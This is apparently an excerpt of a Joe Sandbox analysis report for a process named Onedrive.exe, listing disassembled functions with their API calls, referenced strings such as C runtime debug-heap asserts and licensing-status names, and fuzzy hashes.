Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Concurrency::details::_SchedulerScheduler::_$__crt_unique_heap_ptrnew[]
String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp$minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp$public_stream != nullptr
API String ID: 1578314805-3092436121
Opcode ID: fab107f0d01f61d73088b446f29e6a40f7aa2fc2ebc6ab533c8737ae29e49a99
Instruction ID: cc8c0e1bf0c0429cc957fc4a8ba8fd615dc2fd3264ab3e7983fd9ed42145a9c6
Opcode Fuzzy Hash: fab107f0d01f61d73088b446f29e6a40f7aa2fc2ebc6ab533c8737ae29e49a99
Instruction Fuzzy Hash: 0E510922A2BE82A5EB50DB54E4513BA63A8EF947C0F901132E68E477A6DF7CD644C740

Function 00007FF8A0318873 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FF8A03188C6
Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A0318973
__crt_unique_heap_ptr.LIBCMTD ref: 00007FF8A0318A25
Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A0318A66
type_info::_name_internal_method.LIBCMTD ref: 00007FF8A0318A80

Part of subcall function 00007FF8A03190D0: type_info::_name_internal_method.LIBCMTD ref: 00007FF8A03190E8

Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A0318ABF
__crt_unique_heap_ptr.LIBCMTD ref: 00007FF8A0318AD7

Part of subcall function 00007FF8A03085F0: __crt_unique_heap_ptr.LIBCMTD ref: 00007FF8A03085FE

Strings

C:\Users\user\AppData\Local\Temp\Onedrive.exe, xrefs: 00007FF8A031888C, 00007FF8A03188A9, 00007FF8A0318904

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Concurrency::details::_$SchedulerScheduler::___crt_unique_heap_ptr$type_info::_name_internal_method$CriticalLock::_ReentrantScoped_lockScoped_lock::~_
String ID: C:\Users\user\AppData\Local\Temp\Onedrive.exe
API String ID: 930568095-1635213866
Opcode ID: c197946b17308473d5385c035a85cd2ffa56f7ec18cff5904e093d1f0731d030
Instruction ID: 9076986aa92a8abe06a424586ccdcf34818a6716ec4c75d4479b882f296f96fb
Opcode Fuzzy Hash: c197946b17308473d5385c035a85cd2ffa56f7ec18cff5904e093d1f0731d030
Instruction Fuzzy Hash: 16611C3261EE82A6EA50DF54E4513ABB3A4FBC4780F504136E6CD86BAADF7CD544CB40

Function 00007FF8A031D080 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

__vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A031D142

Part of subcall function 00007FF8A0326620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FF8A0318375,?,?,?,?,00007FF8A0318062), ref: 00007FF8A0326641

__vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A031D202

Strings

_CrtIsValidHeapPointer(block), xrefs: 00007FF8A031D15B
%ls, xrefs: 00007FF8A031D0C2, 00007FF8A031D167, 00007FF8A031D1C4
block != nullptr, xrefs: 00007FF8A031D0B6, 00007FF8A031D11F
minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp, xrefs: 00007FF8A031D0D7, 00007FF8A031D111, 00007FF8A031D17C, 00007FF8A031D1D9
is_block_type_valid(header->_block_use), xrefs: 00007FF8A031D1B8
_msize_dbg, xrefs: 00007FF8A031D118

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: __vcrt_lock$CriticalEnterSection
String ID: %ls$_CrtIsValidHeapPointer(block)$_msize_dbg$block != nullptr$is_block_type_valid(header->_block_use)$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp
API String ID: 3216741998-890774455
Opcode ID: d2e18c4f5006e9fd8889e5d5fa9a9eef759e1c481ae9fff440f1545f77c3845c
Instruction ID: ec49a6ed442e47adf40bdf8f0483e0981b1431dd4d1e7f212d45c4cdc400140c
Opcode Fuzzy Hash: d2e18c4f5006e9fd8889e5d5fa9a9eef759e1c481ae9fff440f1545f77c3845c
Instruction Fuzzy Hash: A5417E31A1AF43A2EB609B21E48077A77A0FB893D5F401536EA8D4BBD5DF3DE5458700

Function 00007FF6104FC4FC Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 56libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,?,00000000,00007FF6104F288B), ref: 00007FF6104FC512
GetLastError.KERNEL32(?,?,?,?,00000000,00007FF6104F288B), ref: 00007FF6104FC526
GetProcAddress.KERNEL32(?,?,?,?,00000000,00007FF6104F288B), ref: 00007FF6104FC559
GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,00000000,00007FF6104F288B), ref: 00007FF6104FC56F
FreeLibrary.KERNEL32(?,?,?,?,00000000,00007FF6104F288B), ref: 00007FF6104FC5AF

Strings

syncreeval, xrefs: 00007FF6104FC57E
SLpTriggerServiceWorker, xrefs: 00007FF6104FC54F
SPPC.DLL, xrefs: 00007FF6104FC509

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Library$AddressErrorFreeHandleLastLoadModuleProc
String ID: SLpTriggerServiceWorker$SPPC.DLL$syncreeval
API String ID: 590180482-1899451423
Opcode ID: 46e5b8ab7ea2b751467af070a34f81cb02269ece383fb26039dd3aadbd22565e
Instruction ID: c976fd43a1003bd10a86a40652df71348d2a3f36205fe0947fbf881dc911b43f
Opcode Fuzzy Hash: 46e5b8ab7ea2b751467af070a34f81cb02269ece383fb26039dd3aadbd22565e
Instruction Fuzzy Hash: 2611AC22B0CF56E6FF045B29AA5017D66A5AF8AFA4B499034CD0EC3754EE3CE4048304

Function 00007FF6104F4D48 Relevance: 13.7, APIs: 9, Instructions: 191memoryCOMMON

Download Yara Rule

APIs

wcsstr.MSVCRT ref: 00007FF6104F4D99
wcsstr.MSVCRT ref: 00007FF6104F4DBC
_wtoi.MSVCRT ref: 00007FF6104F4E45
GetProcessHeap.KERNEL32 ref: 00007FF6104F4EDA
HeapFree.KERNEL32 ref: 00007FF6104F4EEF
wcsstr.MSVCRT ref: 00007FF6104F4F31
wcsstr.MSVCRT ref: 00007FF6104F4F50
GetProcessHeap.KERNEL32 ref: 00007FF6104F4FAA
HeapFree.KERNEL32 ref: 00007FF6104F4FBF

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heapwcsstr$FreeProcess$_wtoi
String ID:
API String ID: 3961436675-0
Opcode ID: 565a0733e25fc3e969219e8b484113a938c3ddbc655a07c7785b9cc9b0e56fb7
Instruction ID: baede1ed3536ad1e156635d792f3e0bf06b206d491988d86f0c8618afcc1cd64
Opcode Fuzzy Hash: 565a0733e25fc3e969219e8b484113a938c3ddbc655a07c7785b9cc9b0e56fb7
Instruction Fuzzy Hash: 1F719022A08E82E6EF109B29A4440BD76A8FFC9FA4F498534DA4EC7795DE3CE515C310

Function 00007FF6104FD618 Relevance: 13.7, APIs: 9, Instructions: 171memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FD688
HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FD69C
wcschr.MSVCRT(?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FD6B9
GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FD7B2
HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FD7C6
GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FD7F4
HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FD808
GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FD82F
HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FD843

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$FreeProcess$wcschr
String ID:
API String ID: 3583101917-0
Opcode ID: 185475bb1725aeff1ff69b328b1550321ae0c595b163fea367dc587829107306
Instruction ID: c08539f340869ff7cbd0568cabb91dcf8ec56b707e7e77fd5af5d2d379d6904d
Opcode Fuzzy Hash: 185475bb1725aeff1ff69b328b1550321ae0c595b163fea367dc587829107306
Instruction Fuzzy Hash: 85618422B08E42E6FF10BB2998800BD66EABF45FA4B498435DA5EC7785DF3CE555C300

Function 00007FF6104FCD40 Relevance: 13.6, APIs: 4, Strings: 5, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6104FD874: _wcsicmp.MSVCRT ref: 00007FF6104FD8EE
Part of subcall function 00007FF6104FD874: _wcsicmp.MSVCRT ref: 00007FF6104FD944

_wcsicmp.MSVCRT ref: 00007FF6104FCDA1
_wcsicmp.MSVCRT ref: 00007FF6104FCDC4
_wcsicmp.MSVCRT ref: 00007FF6104FCDE7

Strings

SL_LICENSING_STATUS_NOTIFICATION, xrefs: 00007FF6104FCDDD
SL_LICENSING_STATUS_LICENSED, xrefs: 00007FF6104FCD97
SL_LICENSING_STATUS_UNLICENSED, xrefs: 00007FF6104FCDBA
LicenseState, xrefs: 00007FF6104FCD5A
SL_LICENSING_STATUS_IN_GRACE_PERIOD, xrefs: 00007FF6104FCE00

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: _wcsicmp
String ID: LicenseState$SL_LICENSING_STATUS_IN_GRACE_PERIOD$SL_LICENSING_STATUS_LICENSED$SL_LICENSING_STATUS_NOTIFICATION$SL_LICENSING_STATUS_UNLICENSED
API String ID: 2081463915-2812009040
Opcode ID: cf784307bdb191ea20cf096f8f6de6f8d4d5616a99717e974fa0e9b77618c7be
Instruction ID: 75efea984ffdb4490fa37755b4ffae408ff9894bc1dbea872b2086f2f1bc466e
Opcode Fuzzy Hash: cf784307bdb191ea20cf096f8f6de6f8d4d5616a99717e974fa0e9b77618c7be
Instruction Fuzzy Hash: 04214760A0CE46E6EE548B19A6C02BEA666FB45FE4F449035DA0EC7B48DF3CE4648704

Function 00007FF8A0331990 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 358COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A0332010: memcpy_s.LIBCPMTD ref: 00007FF8A0332061

Concurrency::details::BoostedObject::IsScheduleGroupSegment.LIBCMTD ref: 00007FF8A0331E59
Concurrency::details::BoostedObject::IsScheduleGroupSegment.LIBCMTD ref: 00007FF8A0331FD4

Strings

("unexpected input value; log10 failed", 0), xrefs: 00007FF8A0331B12
minkernel\crts\ucrt\src\appcrt\convert\cfout.cpp, xrefs: 00007FF8A03319E9, 00007FF8A0331B33, 00007FF8A0331ED6
%ls, xrefs: 00007FF8A03319D4, 00007FF8A0331B1E, 00007FF8A0331EC1
mantissa_buffer_count > 0, xrefs: 00007FF8A03319C8
quotient < digits_per_iteration_multiplier, xrefs: 00007FF8A0331EB5

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: BoostedConcurrency::details::GroupObject::ScheduleSegment$memcpy_s
String ID: %ls$("unexpected input value; log10 failed", 0)$mantissa_buffer_count > 0$minkernel\crts\ucrt\src\appcrt\convert\cfout.cpp$quotient < digits_per_iteration_multiplier
API String ID: 3679209886-1168176157
Opcode ID: 4325e9b5c20b1b86593e760ec00f5385cf082cd06ed0e168ca7847738c9bb225
Instruction ID: 03a48bab05c7b0b8c08709a93aa03780b2d2d4e119012eada73658d7fade7b91
Opcode Fuzzy Hash: 4325e9b5c20b1b86593e760ec00f5385cf082cd06ed0e168ca7847738c9bb225
Instruction Fuzzy Hash: 72021F3261EAC29AE760DB15E4803ABB7A1FB85780F50513AE78D87B99DF3CD445CB01

Function 00007FF8A0309560 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 333COMMON

Download Yara Rule

APIs

allocator.LIBCPMTD ref: 00007FF8A0309783

Strings

%ls, xrefs: 00007FF8A03095B3, 00007FF8A03096BA, 00007FF8A0309AC0
minkernel\crts\ucrt\src\appcrt\stdio\output.cpp, xrefs: 00007FF8A03095C8, 00007FF8A030962B, 00007FF8A03096CF, 00007FF8A0309732, 00007FF8A0309AD5, 00007FF8A0309B38
("Buffer too small", 0), xrefs: 00007FF8A0309AB4, 00007FF8A0309B46
buffer != nullptr && buffer_count > 0, xrefs: 00007FF8A03096AE, 00007FF8A0309740
format != nullptr, xrefs: 00007FF8A03095A7, 00007FF8A0309639
common_vsnprintf_s, xrefs: 00007FF8A0309632, 00007FF8A0309739, 00007FF8A0309B3F

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: allocator
String ID: %ls$("Buffer too small", 0)$buffer != nullptr && buffer_count > 0$common_vsnprintf_s$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
API String ID: 3447690668-215146566
Opcode ID: 8d57fec41b4c742aac83ea82b647f2bd7548b34a8331297ae6f6faa5e1863818
Instruction ID: 3f8e968668d71437712d4582d7f170eafb1701ba413afcf281f3afc7cc073d15
Opcode Fuzzy Hash: 8d57fec41b4c742aac83ea82b647f2bd7548b34a8331297ae6f6faa5e1863818
Instruction Fuzzy Hash: 2E023E3291EE8796EA709F54E4403AAB3A0FB84794F104236E6DE47BD9DF7CD4458B40

Function 00007FF8A0308E80 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 331COMMONLIBRARYCODE

Download Yara Rule

APIs

allocator.LIBCPMTD ref: 00007FF8A03090A3

Strings

%ls, xrefs: 00007FF8A0308ED3, 00007FF8A0308FDA, 00007FF8A03093DA
minkernel\crts\ucrt\src\appcrt\stdio\output.cpp, xrefs: 00007FF8A0308EE8, 00007FF8A0308F4B, 00007FF8A0308FEF, 00007FF8A0309052, 00007FF8A03093EF, 00007FF8A0309452
("Buffer too small", 0), xrefs: 00007FF8A03093CE, 00007FF8A0309460
buffer != nullptr && buffer_count > 0, xrefs: 00007FF8A0308FCE, 00007FF8A0309060
format != nullptr, xrefs: 00007FF8A0308EC7, 00007FF8A0308F59
common_vsnprintf_s, xrefs: 00007FF8A0308F52, 00007FF8A0309059, 00007FF8A0309459

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: allocator
String ID: %ls$("Buffer too small", 0)$buffer != nullptr && buffer_count > 0$common_vsnprintf_s$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
API String ID: 3447690668-215146566
Opcode ID: 9ccc0799407a035980ca35a257dbbe8603f8fb4214fbec40f9633d6e023181ab
Instruction ID: 9e72b19e34baad51f714df27735a84751cf550495b741337e662d244475d53c3
Opcode Fuzzy Hash: 9ccc0799407a035980ca35a257dbbe8603f8fb4214fbec40f9633d6e023181ab
Instruction Fuzzy Hash: 88023C3290EE8796EA70DB55E4403AAB3A0FB84394F104236E6DE87BD9DF7CD4458B40

Function 00007FF6104F3260 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 164memoryCOMMON

Download Yara Rule

APIs

?GetSelectionIndex@TouchSelect@DirectUI@@QEAAHXZ.DUI70 ref: 00007FF6104F32AF
GetProcessHeap.KERNEL32 ref: 00007FF6104F33A9
HeapFree.KERNEL32 ref: 00007FF6104F33BD

Part of subcall function 00007FF6104F1008: EventWriteTransfer.ADVAPI32 ref: 00007FF6104F108B

Strings

ChooseRegion, xrefs: 00007FF6104F3409
Loading, xrefs: 00007FF6104F33EC
TollNumber, xrefs: 00007FF6104F330E, 00007FF6104F334B
Number, xrefs: 00007FF6104F32ED, 00007FF6104F332B

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$DirectEventFreeIndex@ProcessSelect@SelectionTouchTransferWrite
String ID: ChooseRegion$Loading$Number$TollNumber
API String ID: 4007878856-2571249176
Opcode ID: 0279151202938e21ffb4fb5d64393771a02b836f32215ccfbddf941e754a0aa0
Instruction ID: 5d0b749a13361777ebe448ff05fe88e2e640f45c2b03d5603a47b806bad73a64
Opcode Fuzzy Hash: 0279151202938e21ffb4fb5d64393771a02b836f32215ccfbddf941e754a0aa0
Instruction Fuzzy Hash: D0714A21B08E43E5EF14DB69D9902BC23A9EF48FA9F409531DA0DC7799DE2CE425C310

Function 00007FF6104F8FF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 159COMMON

Download Yara Rule

APIs

?Create@DUIXmlParser@DirectUI@@SAJPEAPEAV12@P6APEAVValue@2@PEBGPEAX@Z2P6AX11H2@Z2@Z.DUI70(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,00000000,?), ref: 00007FF6104F9036
?SetXMLFromResource@DUIXmlParser@DirectUI@@QEAAJIPEAUHINSTANCE__@@0@Z.DUI70(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,00000000,?), ref: 00007FF6104F9060
?CreateElement@DUIXmlParser@DirectUI@@QEAAJPEBGPEAVElement@2@1PEAKPEAPEAV32@@Z.DUI70(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,00000000,?), ref: 00007FF6104F9099

Part of subcall function 00007FF6104F66D4: CoTaskMemFree.API-MS-WIN-CORE-COM-L1-1-0 ref: 00007FF6104F675E

Part of subcall function 00007FF6104F6610: CoTaskMemFree.API-MS-WIN-CORE-COM-L1-1-0 ref: 00007FF6104F66AF

GetScaleFactor.DUI70(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,00000000,?), ref: 00007FF6104F910A
?Destroy@DUIXmlParser@DirectUI@@QEAAXXZ.DUI70(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,00000000,?), ref: 00007FF6104F91A2

Strings

Compliance, xrefs: 00007FF6104F9086
ComplianceText, xrefs: 00007FF6104F90DB

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: DirectParser@$FreeTask$CreateCreate@Destroy@E__@@0@Element@Element@2@1FactorFromResource@ScaleV12@V32@@Value@2@
String ID: Compliance$ComplianceText
API String ID: 570248755-1314619677
Opcode ID: 8b78037bbcabbcbb6045ab8e19150145eef68e87cc9f8055a6f0a411eb7a8557
Instruction ID: 9d663ca2261100a2c53dec0eabf8bc4a7b5fcd6b6a9a0dd80d65e26daa8a3f5b
Opcode Fuzzy Hash: 8b78037bbcabbcbb6045ab8e19150145eef68e87cc9f8055a6f0a411eb7a8557
Instruction Fuzzy Hash: 14711A36B08E42AAFB109F69E5943AD37A5FB48BA8F008435DA0DC6B59DF3CE4558704

Function 00007FF6104F27A0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6104F2959
HeapFree.KERNEL32 ref: 00007FF6104F296E

Strings

ErrorCID, xrefs: 00007FF6104F2916, 00007FF6104F292F

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$FreeProcess
String ID: ErrorCID
API String ID: 3859560861-3250631935
Opcode ID: 87562fb0df644233fc4ef7c3f415d9b073dabda7fb8b5e47c8d9690f725e6cbc
Instruction ID: 5732e5d7118215eb6802d008b08e42ec60863690867c17a1638515d9001cb3b1
Opcode Fuzzy Hash: 87562fb0df644233fc4ef7c3f415d9b073dabda7fb8b5e47c8d9690f725e6cbc
Instruction Fuzzy Hash: 1E513731E08E02E6FF00AB65D5902BD26A9AF89FA8F644435D90ED7759DF3CE4158710

Function 00007FF8A031BB90 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

swprintf.LIBCMTD ref: 00007FF8A031BCCD

Strings

%.2X , xrefs: 00007FF8A031BCBB
(*_errno()), xrefs: 00007FF8A031BD04
, xrefs: 00007FF8A031BC60
print_block_data, xrefs: 00007FF8A031BCF8
Data: <%s> %s, xrefs: 00007FF8A031BD6D
minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp, xrefs: 00007FF8A031BCEC

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: swprintf
String ID: $ Data: <%s> %s$%.2X $(*_errno())$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$print_block_data
API String ID: 233258989-578187083
Opcode ID: dc6febcad760b90265b93becb28017f616756b66ea6b9f90a2c4d3c71971683e
Instruction ID: 2c96bfeede7cdca4c47ac27081c8d59171351e0e8533af9e7fc88f1b482972af
Opcode Fuzzy Hash: dc6febcad760b90265b93becb28017f616756b66ea6b9f90a2c4d3c71971683e
Instruction Fuzzy Hash: FA51397260DF82A5EA209B55F0903ABB7A0FB897C1F504036EACD47B9ADF7DD0448B40

Function 00007FF8A0327F60 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A0327FC8
__crt_unique_heap_ptr.LIBCMTD ref: 00007FF8A0327FD0

Strings

